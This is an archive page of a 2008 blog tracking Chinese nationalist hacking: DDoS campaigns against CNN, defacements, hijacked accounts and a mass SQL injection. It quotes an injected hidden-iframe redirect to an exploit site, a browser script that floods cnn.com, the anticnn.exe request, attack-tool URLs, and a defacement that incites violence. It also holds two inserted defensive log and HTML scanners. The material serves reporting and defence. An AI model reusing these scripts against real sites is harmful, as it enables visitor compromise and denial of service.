Archive for the 'Nationalism' Category

Jul 14 2008

Bruce Schneier: The Truth About Chinese Hackers

Bruce Schneier

Bruce Schneier is a well-known security and cryptography researcher.  He has a popular blog where he posted his recent article detailing “The Truth About Chinese Hackers”, which was written for Discovery Channel.

This article is not particularly insightful and sort of lumps all of the Chinese hackers into a single group of young, male patriotic kids doing it for the babes and limos.

These hacker groups seem not to be working for the Chinese government. They don’t seem to be coordinated by the Chinese military.

The hackers are in this for two reasons: fame and glory, and an attempt to make a living.

This is very short-sighted. We should be honest here: neither Bruce Schneier nor Heike and I know with absolute certainty what Chinese hackers are doing, who is coordinating them or who might be paying them. Maybe the article shouldn’t be titled “The Truth About Chinese Hackers” because Bruce doesn’t know what the truth is (Heike would have said that he couldn’t handle the truth either, but that’s not my style).

I think a lot of people assume that activity attributed to the PRC is simply based on the IP address.  After studying spear phishing attacks, custom malware attacks and the types of data that have been exfiltrated from various NGO targets it seems likely that some entity is coordinating the collection and exploitation of this information.  In my humble opinion, there may be more to this than WoW passwords.

 


Jul 07 2008

Bejtlich on last month’s Cyber Panel

Published by jumper under Hacker Organization, Nationalism

Richard Bejtlich blogged about the AF Cyber Panel last month and provides a plug for the TDV book which he reviewed a while ago.  The Cyber Panel had some informal discussion about the cyber-militia:

In the US, our DoD relies upon professional, uniformed military members, government civilians, and an immense contracting force to defend the nation and project its military power. In China, their PLA mixes uniformed military with ordinary civilians, some of whom act at the behest of the military and government, with others acting on their own for “patriotic means.” 

The discussion turns into a comparison of the US/PRC capabilities and specifically how the US can recruit and retain qualified cyber warriors.  The problem seems to be that the PRC can call up an army of qualified patriotic hackers while the US is having problems recruiting and retaining talent.


Jun 06 2008

Chinese hackers target India…again.

Published by Heike under Nationalism

Routine business:

NEW DELHI: Hackers have struck again with nearly 10 websites belonging to various ministries and departments of the government of India coming under attack in the last 24 hours. The hackers are suspected to be from China, though there was no official confirmation.

Confirming the cyber attack, a senior IT ministry official told DNA, “Low to medium intensity cyber intrusions into web servers maintained by the Indian government have been reported.”

New Delhi…just shrugs.


May 29 2008

Chinese hackers target Sharon Stone

The first calls are starting to make the rounds on Chinese hacker sites to attack the Sharon Stone website. The actress recently started a firestorm in China after she gave an interview suggesting that the earthquake in Sichuan was the result of bad karma. I guessed it would be just a matter of time before Chinese hackers targeted her online and have been monitoring the boards.

One site has posted a bit of initial reconnaissance of the website:

There was also a post asking to have the unofficial website of Sharon Stone hacked:

Tried going to the website for a contact address but found the, “This site may harm your computer” posting. Maybe Jumper will have the time to check it out later.


May 28 2008

Tibetan writer’s online ID hijacked

Ordinarily, I’d try to obfuscate text on this subject but since we’re already GFW’d, who cares…

A couple of sites are reporting that the well-known Tibet independence writer Woeser has had all or many of her online accounts hijacked and her website defaced with an anti-splittist message. The Honkers Union of China has taken responsibility.  The honkers have used her Skype account to attempt to contact her associates.  No word if the contact list has been abused to send malware.  Interesting snippet from the article:

The hackers removed the content of the website and replaced it with a gif animation of the Chinese flag with the headline “LONG LIVE THE PEOPLE’S REPUBLIC OF CHINA! “DOWN WITH TIBET INDEPENDENCE!” Below the animation is a photo of Woeser with the words “Please remember this Tibetan separatist Woeser’s ugly face. Whoever sees this ugly face, please beat her hard like one beats a dog.” Further text was added and has apparently been changed several times in the hours since the site was hacked. The website is currently hosted on a server in the United States.

The website is still defaced at the time of this writing.

Top half of the defaced site

Bottom half of the defaced site

 


May 15 2008

More Patriotic Hacking

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to the ISC includes obfuscated JavaScript with a check on whether the web browser’s language is set to PRC/Mainland Chinese (zh-cn). Anyone whose browser is not set to zh-cn gets redirected to a site hosting browser exploits. Cool. Here is the code snippet from the ISC:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=http://www.ririwow.cn/index.htm width=100 height=0></iframe>");}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).
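What a site owner would want after a mass injection like this is a way to find the injected snippet across the whole web root. The scanner below is an added example, not code from The Dark Visitor, the ISC or pauldotcom: it flags scripts that branch on navigator.systemLanguage and iframes of zero height or width that load from another host. The regexes and the two sample pages are my own constructions; the injected sample is rebuilt from the ISC snippet quoted above, and the site host name is a placeholder.

```python
"""Scan HTML served from a web root for the injection described above: a script
that branches on the browser language (navigator.systemLanguage) and a hidden
iframe that pulls content from another host.

Added example, not code from The Dark Visitor, the ISC or pauldotcom. The
patterns are assumptions about how the injected snippet looks on disk; the
sample pages at the bottom are constructed, the injected one rebuilt from the
ISC snippet quoted in the post.
"""
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# A comparison against the browser locale, the gate the ISC snippet uses.
LANGUAGE_GATE = re.compile(
    r"navigator\.(?:systemLanguage|userLanguage|browserLanguage|language)\s*[!=]==?", re.I)
# Any <iframe ...> markup, literal or inside a document.write/writeln string.
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
# Attribute parser that tolerates unquoted values (the snippet writes src=http://... bare).
ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
ZERO_SIZES = {"0", "0px", "0%"}


def _attributes(tag_body):
    """Map attribute names (lower-cased) to values for one tag body."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR.finditer(tag_body)}


def scan_html(html, site_host):
    """Return findings for one document that site_host serves; an empty list means clean."""
    findings = []
    if LANGUAGE_GATE.search(html):
        findings.append("script branches on browser language (navigator.systemLanguage)")
    for m in IFRAME_TAG.finditer(html):
        attrs = _attributes(m.group(1))
        host = urlparse(attrs.get("src", "")).hostname or site_host  # relative src stays on-site
        hidden = (attrs.get("height", "").lower() in ZERO_SIZES
                  or attrs.get("width", "").lower() in ZERO_SIZES)
        if hidden and host != site_host:
            findings.append(f"hidden off-site iframe -> {host}")
    return findings


def scan_webroot(root, site_host):
    """Walk a directory of .htm/.html files and report findings per file."""
    report = {}
    for path in Path(root).rglob("*.htm*"):
        found = scan_html(path.read_text(errors="replace"), site_host)
        if found:
            report[str(path)] = found
    return report


# --- constructed sample pages (placeholder host: www.example-victim.test) ----
INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<script>
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm width=100 height=0></iframe>");}
</script>
</body></html>"""
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="/video/player.html" width="640" height="360"></iframe>
<script>var lang = navigator.language; document.title = 'Welcome (' + lang + ')';</script>
</body></html>"""

if __name__ == "__main__":
    root, host = sys.argv[1], sys.argv[2]  # e.g. /var/www/html www.example-victim.test
    for file, found in scan_webroot(root, host).items():
        print(file, *found, sep="\n  ")
```

A locale check on its own is not proof of compromise, since pages legitimately read navigator.language for localisation, so the language finding is a triage signal; the hidden off-site iframe is the stronger one. The unquoted-attribute handling matters because the injected markup is written out from JavaScript rather than served as normal HTML, and a parser that expects quoted attributes would miss the src.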

Thanks for the heads-up Benny!


Apr 24 2008

New “Kinda-Lazy” Chinese hacker attack on CNN scheduled for tomorrow. UPDATE x2

UPDATE FIZZLE: Just got word from Jose that nothing happened with the CNN website today. Chinese hackers are starting to make me look bad and I will not stand for that!! :)

If this keeps up, it may be easier to list the days that Chinese hackers are not calling for an attack on CNN.

Had some serious reservations about posting this article for a couple of reasons but decided it is probably worthwhile. The cons are that there is ZERO confirmation from other sites about the impending attack and the alert posting did not list a sponsoring organization. On the pro side, it included a website that was set up on the 20th (after the initial attack), is linked in the post and looks like it is there to support the action.

So, large CAVEAT: UNCONFIRMED

Added bonus, stupid clock again:

The Announcement

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issues regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us.

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people.

If it is convenient, please circulate this message to all of your groups. We need support…. Currently, many of us are going to this webpage to carry out the attack, http://www.goupsoft.com.cn/Bs_Cnn.html. The first time you open it, it might not display. Just refresh the page and it should be okay.

Kinda Lazy (but genius!)

Over at the attack website of goupsoft.com, you land on an automated webpage that uses your computer and IP address to continuously “attack” the CNN website unless you close the browser. My guess is that it is constantly making fresh requests from CNN to tie up bandwidth. The graphic below even shows the number of attacks you have made on the site.

Yeah, I kinda attacked CNN 24 times…Whoops! Well, CNN never returned my e-mail either! Damn, I’m sort of a Chinese hacker now? Anyway, the only really interesting thing in that blurb of Chinese above is that they call CNN a “whore.” Really, twice.

This Attack Method Spreading

While this might be the oldest trick in the book, it is new to me so I’m putting it out there. The website http://www.chenmin.org/doscnn.html is using pretty much the exact same attack method as mentioned previously.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds, using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five, six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:

Yes. It loads an iframe: And then it reloads itself every five seconds:

<script>
var e=document.getElementById('cnn');
setInterval("e.src='http://www.cnn.com'",5000);
// 1000 means 1000 milliseconds; you may modify this and forward it
</script>

Probably not as effective as the Mao-inator program.

I direct your attention to the last line (emphasis mine) in Jumper’s e-mail. Number one, he dubs the program he analyzed yesterday the Mao-inator™, which I personally find hilarious. Number two, there seems to be a slight amount of professional jealousy involved since he is dismissing my program as “less effective” than the one he worked with. Yeah, but did yours call CNN a “whore”? Didn’t think so! Less effective, I think not sir!

All kidding aside, this is an excellent method for incorporating large numbers of unskilled people into your DDoS attack. It comes with the added advantage of using their computers, IP addresses and bandwidth and you don’t have to train them. The only skill that is required is the ability to open a webpage in a browser and let it run. Plus, recruits who might not be so willing to stick around to the end of the fight, if tied to a computer all day, are free to do whatever they want while at the same time defending the motherland. My vote GENIUS!

Make up your own odds if this will actually take place. I have informed Jose Nazario at Arbor Networks who has been monitoring this situation closely and has had great insights.

UPDATE 1: Located the blog for Li Haiwei, the owner of the attack website goupsoft.com.cn, and my boy has some serious issues with CNN and Tibet. Lots of disturbing imagery for the whole family:

The graphic reads, “CNN- I like it. I am CNN.” Then some stuff way too small to read. The Nobel Peace Prize award you can read yourself and at the bottom Tibet.

UPDATE 2: Netcraft has a live performance monitor for the CNN website here.


Apr 22 2008

Return of Poizon B0x?

Does anyone remember Poizon B0x from the “Sino-US Hacking War” years ago?

Some Chinese hacker group thinks Poizon B0x is coming back on a “China Killer” rampage in what they describe as a second round of the Sino-US hacking war. Here is the gist of a board post from April 20, 2008:

Red Alert:  Beware of the United States hacker organization Poizon B0x coming in again.

No news organizations are reporting this but [rumors] are spreading around the Internet that a new round of the Sino-US hacking war [is coming... and] a May 1/Golden week special youth day counter-offensive [is planned], we hope for a lot of support in the counterattack!

The May 1st date mentioned above is highly significant as it coincides with the anniversary of the EP-3 incident in 2001 and the start of Chinese hacker counter-attacks:

American cracker group PoizonBOx has defaced at least a hundred Chinese websites since April 4 (2001). Chinese hackers are now vowing to retaliate with a planned week-long all-out crack attack on American websites and networks which will start on May 1(2001).

At this point, it is difficult to tell if this is speculation or if it is based on some defacements attributed to Poizon Box.  I can’t seem to find much else to corroborate this post so I’m a bit skeptical about all of this.  I’ll monitor the board and report any news as it comes in.  Any offline comments or questions can go to jumper *at* thedarkvisitor *dot* com.


Apr 22 2008

More on anticnn.exe

CNN-hating Chinese nationalists can download a tool that sends high volumes of requests to www.cnn.com in an attempt to knock it offline. The tool is bundled in a .rar file that contains a readme and the pre-compiled Windows binary. A quick virus check showed that some scanners identified it as a backdoor, but that didn’t seem to be the case. When I ran the tool, a simple flag icon appeared in the lower right of my test VM.

 When I click on the flag, the full interface appears with three options:  start/stop, minimize and exit. 

Here is a sample of the request/response I got after running it for a few seconds:

GET /aux/con/com1/../../[LAG]../.%%%%%%%%./../../../../fakecnn/redflag-stay-here.php.aspx.asp.cfm.jsp HTTP/1.1
Accept: */*
Host: www.cnn.com
Connection: Keep-Alive

HTTP/1.1 400 Bad Request
Date: Tue, 22 Apr 2008 12:12:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 287
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache Server at
www.cnn.com Port 80</address>
</body></html>

I read somewhere that it is self-updating but I never saw any requests other than DNS resolution (to my own configured DNS servers, not hard-coded) and requests to www.cnn.com.  I’ll run it in “paused” mode for a while to see what happens.
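For the defender on the receiving end, the request above and the five-second iframe reload from the earlier post both leave distinctive marks in the access log. The script below is an added example, not code from The Dark Visitor, Arbor Networks or the tool’s authors: it parses Apache-format lines, counts per-client hits on the markers of the anticnn.exe request line (the fakecnn/redflag-stay-here tag, the Windows reserved device names combined with traversal, the run of percent signs) and reports clients that re-request the same path many times within one minute. The log lines are constructed with documentation IP addresses; the marker regexes and the thresholds are my assumptions.

```python
"""Defender-side triage of a web server access log during a request flood.

Added example, not code from The Dark Visitor or from any tool named on the
page. It assumes Apache common/combined log format and uses constructed log
lines (documentation IP ranges) that mimic the anticnn.exe request quoted
above and a browser tab reloading the front page every five seconds.
"""
import re
from collections import Counter

# One Apache common-log line; the combined format just appends referer and agent.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Markers taken from the anticnn.exe request line quoted in the post (assumed stable).
SIGNATURES = [
    re.compile(r"/fakecnn/redflag-stay-here", re.I),                # literal tag in the tool's URL
    re.compile(r"/(?:aux|con|com\d|lpt\d|nul|prn)/.*\.\./", re.I),  # reserved device names plus traversal
    re.compile(r"\.%{3,}\./"),                                      # run of bare percent signs
]


def is_anticnn_request(path):
    """True when a request path carries any of the anticnn.exe markers."""
    return any(sig.search(path) for sig in SIGNATURES)


def parse(lines):
    """Yield (ip, minute_bucket, path) for each well-formed line; skip the rest."""
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            # ts looks like 22/Apr/2008:12:12:34 +0000; the first 17 chars name the minute.
            yield m.group("ip"), m.group("ts")[:17], m.group("path")


def signature_hits(lines):
    """{ip: (total requests, requests matching the tool signature)} for clients with a hit."""
    total, hits = Counter(), Counter()
    for ip, _, path in parse(lines):
        total[ip] += 1
        if is_anticnn_request(path):
            hits[ip] += 1
    return {ip: (total[ip], hits[ip]) for ip in hits}


def steady_reloaders(lines, per_minute=10):
    """Clients fetching the same path at least per_minute times inside one minute,
    the footprint of an iframe that re-requests a page every few seconds."""
    counts = Counter((ip, bucket, path) for ip, bucket, path in parse(lines))
    flagged = {}
    for (ip, _bucket, _path), n in counts.items():
        if n >= per_minute:
            flagged[ip] = max(flagged.get(ip, 0), n)
    return flagged


# --- constructed sample log (documentation addresses; not real traffic) -------
ANTICNN_PATH = "/aux/con/com1/../../[LAG]../.%%%%%%%%./../../../../fakecnn/redflag-stay-here.php.aspx.asp.cfm.jsp"
SAMPLE_LOG = [
    f'203.0.113.7 - - [22/Apr/2008:12:12:34 +0000] "GET {ANTICNN_PATH} HTTP/1.1" 400 287',
    f'203.0.113.7 - - [22/Apr/2008:12:12:34 +0000] "GET {ANTICNN_PATH} HTTP/1.1" 400 287',
    '198.51.100.20 - - [22/Apr/2008:12:12:35 +0000] "GET /index.html HTTP/1.1" 200 51234',
    '198.51.100.20 - - [22/Apr/2008:12:12:36 +0000] "GET /style.css HTTP/1.1" 200 812',
    "garbage line that does not parse",
] + [
    # one browser tab reloading "/" every five seconds for a minute
    f'192.0.2.9 - - [22/Apr/2008:12:13:{s:02d} +0000] "GET / HTTP/1.1" 200 51234'
    for s in range(0, 60, 5)
]

if __name__ == "__main__":
    print("signature hits:", signature_hits(SAMPLE_LOG))
    print("steady reloaders:", steady_reloaders(SAMPLE_LOG))
```

Because the tool’s request never parses, the server answers 400 without touching application code, so the cost is in connection and bandwidth handling rather than CPU; the per-client list is what feeds a rate limit or firewall rule. The steady-reloader check is there for the browser-based variant, whose individual requests look like ordinary page loads and only stand out by their cadence.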

UPDATE (0100GMT 23 April 08):  No suspicious traffic came from this binary (apart from what was expected, of course).

UPDATE (1628GMT 24 April 08): Heike and I have dubbed anticnn.exe the “Mao-inator”.


Apr 21 2008

Chinese hackers displaying CNN hack trophy?

Published by Heike under Nationalism, Tibet, US attacks

Danwei reporting that Chinese hackers are celebrating a successful hack on a portion of the CNN website with screen shots of their trophy:

The top picture is a screen grab that shows the current state of the website. The second image shows the hacked web page and the slogans left by the hackers, both in English and Chinese:


Apr 20 2008

Revenge of the Flame disbands, denies all responsibility for attack on CNN…and kills website

The leader of Revenge of the Flame has taken down his website and posted a disbandment notice.

!!!We salute our lovable motherland!!!

(graphic posted in the center of this statement does not load)

Revenge of the Flame disbanded

There are actually many ways to be patriotic, we do not want to be impulsive, we should study well, struggle and take great effort to gain knowledge. Only in this way can we develop our motherland and our motherland’s strength. This is all we really wish to see happen.

The Revenge of the Flame has already halted all DDOS attacks, we do not advocate the attack, we advocate diligent study of technology. From this point on, any attack whatsoever, has nothing to do with Revenge of the Flame. If any member of our group, Revenge of the Flame, participates in this type of activity, it is an individual action and has nothing to do with cn_Magistrate or Hackerwolf. Request that everyone make careful deliberations.

(Note: I was under the impression that magistrate hackerwolf was one word, one name but obviously it is two individuals. Here are their blogs; cn_Magistrate and Hackerwolf.)

Currently, everyone on the internet is using the instrument of attack as a means to express their passion and this has already obstructed the motherland’s normal network communications. This is something we do not wish to see happen. Regardless if it is “Revenge of the Flame” or not, we hope that everyone can rationally reflect on this question.

From this moment, the Revenge of the Flame is disbanded!! If there are any notifications after this, they will be posted here. We respectfully ask that you pay attention to this page.

Any attack whatsoever, regardless if it is by an individual or an organization, has serious consequences!!!!!!!!!!!!!!!!!!!!!!

The Revenge of the Flame exists no more forever!! We are now a “patriotic study organization” and we will take the flame into our heart! The Revenge of the Flame in our hearts can never be extinguished! We must struggle! We must work! We must turn our strengths into a shining sword spirit (this sentence may have a somewhat different meaning, not sure).

Without a doubt we must study even more, our forum has already been established. This is really our true exchange space.

http://bbs.hacksa.cn

cn_Magistrate
Hackerwolf

20 April 2008

To our lovable motherland, I say I love you!!


Apr 19 2008

More from Revenge of the Flame on CNN attack

Located cn_Magistrate’s blog, the leader of Revenge of the Flame, here is a post from his blog on 18 April 2008:

As always, my thanks for everyone’s strong sense of nationalistic responsibility; once again, the Magistrate is grateful to everyone.

Today is 18 April, we are angry and we shall roar, the announcement follows:

  1. Prior to 8:00 pm on 18 April 2008, we invite everyone on IS (ID number 12570496).  We will have an important matter to pass along.  (This part is a little rough in translation.) Please note our compatriots will find a way online; obey the directions that have been put in place.
  2. Tool download address, considering that there are many normal web users who do not have a high-degree of technical knowledge, we are providing idiot-type (really means for those who don’t know) tools for download. The download address: http://playgood.ys168.com/.  Everyone please pay attention to the group announcements.
  3. Everyone please remain disciplined, listen to the directions of each of the group managers.  Pay attention to your own words, deeds and essence.  We are all Chinese!

18 April 2008
cn_Magistrate
Hackerwolf


Apr 18 2008

Chinese hacker group identified as “Revenge of the Flame” calls off attack on CNN…too many people know

Graphic Attached to Release

Graphic Attached to Release by Revenge of the Flame

The Chinese hacker group that has been organizing to attack CNN has been identified as the “Revenge of the Flame.” They recently released a statement calling off the DDoS attack on CNN; however, it may have come too late to stop some of its members from going after the site. CNN has just filed a report stating that they had experienced an attack in an attempt to disrupt their website. For this reason, we will keep the clock up and see what happens tomorrow…it might not be over.

Statement from Revenge of the Flame:

In just three short days, our organization, the Revenge of the Flame, has grown large. First, I want to thank everyone for their strong sense of nationalistic responsibility. However, maybe we were too impetuous. We love our country! We will resist all anti-Chinese influences! However, we must choose the right way to come to the defense of our country, families and ourselves!!! After some core internal discussions, we have decided to temporarily cancel the 19th attack plan! The Revenge of the Flame organization still exists! Later we can be a computer discussion organization, we will study together for the day our country needs us! Our government and military will all mobilize! At that time, we will let those so-called foreign net-forces see! No matter where, China will never lose to them! We also have our net-forces! Perhaps at that time, our Revenge of the Flame will be the main strength! We all love our country! But, we must use sensible methods to defend our honor!

ATTENTION: Our original plan for 19 April has been canceled because too many people are aware of it and the situation is chaotic. At an unspecified date in the near future, we will launch the attack. We ask that everyone remain ready. I will repeat it again. At an unspecified date in the near future, we will launch the attack. We are only at present cancelling the attack. We could send out a notice on the day of the attack and have it completed in one day. The attack hasn’t been cancelled; it will be carried out on an unspecified day in the near future. I think everyone understands what we mean.

We hope that even more people with the Chinese national blood will join our actions. Only in unity is there strength. We are not individuals, we are a collective, and we are Chinese.

17 April 2008
Magistrate
Hackwolf
Source: http://www.hacksa.cn


Apr 17 2008

BREAKING: Upcoming Chinese hacker attack on CNN building steam

Published by Heike under Nationalism, Tibet, US attacks

UPDATE: It looks like the organizers might be trying to put a stop to the attack due to the number of people who are aware of it. Translating some of it now.
UPDATE to UPDATE: While the group may be trying to call off the attack, it might be too late. CNN is now reporting that they have been targeted in an attempt to disrupt their web site.
FINAL UPDATE FOR THIS POST: See the newest release by the group planning attack on CNN here

First, I have added a clock with the Beijing local time because it crossed my mind that some people might be thinking the scheduled attack on CNN is going to take place on US date and time. Nope, Beijing local. So that means it is supposed to take place tomorrow. I will leave the clock up if you want to check back.

Second, many more Chinese sites, not just hacker sites, are starting to call for the DDOS attack on CNN. They are also starting to solidify their plans. Here are the details from one posting on the Guilin University of Electronic Technology bulletin board:

  1. Attack will start on 19 April 2008, at 8:00 pm
  2. DDOS attack on www.cnn.com
  3. The DDOS attack is going to last over three hours
  4. They need a large number of compromised computers to carry out the attack and are requesting everyone’s support in putting together the number needed

The plan has many more details but unfortunately the language is too technical for me to translate.

Here are additional sites calling for the attack on CNN.

http://bbs.neteasy.cn/showthread.php?p=984976
http://www.coogo.net/bbs/showtopic-444648.aspx
http://www.ytjt.com.cn/bbs/redirect.php?tid=36644&goto=lastpost
http://www.ipark.cn/bbs/Post.asp?PostID=836336
http://blog.xuite.net/lemon_head/simple/16728332
http://tieba.baidu.com/f?kz=357748876

Probably many more out there.

UPDATE: Carl Jongsma, from Computer World, was kind enough to provide us a little press on this breaking situation.

UPDATE: Tried once again to contact CNN and warn them of the scheduled attack. If anyone has a better contact than just their news tip e-mail, please inform them.

UPDATE (APRIL 18 1556GMT; Jumper): Arbor Networks is using their tools to monitor the situation.  Take a look at Jose Nazario’s post here.

UPDATE: Since we have some smart people looking at the blog, I wanted to post below part of the Chinese hackers’ attack plan. This seems to be part of the DDoS call for large numbers of attacking computers. Will supply what I can about the Chinese, though it is possibly wrong. If someone knows what this is referring to please post in the comments and we will move it to the blog:

总群:29332975 (This refers to the total number)
复仇的火焰分群1:10093595 (Revenge of the flame group 1)
复仇的火焰分群2:60087657 (Revenge of the flame group 2)
复仇的火焰分群3:17697381 (Revenge of the flame group 3)
复仇的火焰分群4:52911651 (Revenge of the flame group 4)
复仇的火焰分群5:13283694 (Revenge of the flame group 5)
复仇的火焰分群6:52274747 (Revenge of the flame group 6)
复仇的火焰分群7:13735729 (Revenge of the flame group 7)
复仇的火焰分群8:28556275 (Revenge of the flame group 8 )
复仇的火焰分群9:8333214 (Revenge of the flame group 9)
复仇的火焰分群10:24207831 (Revenge of the flame group 10)
复仇的火焰分群11:18574877 (Revenge of the flame group 11)

UPDATE to UPDATE Jumper figured out that these were probably the QQ numbers for the group leaders of the attack. When I went back and looked at some of the sites calling for the DDoS attack, one did list it as QQ群 or QQ groups.
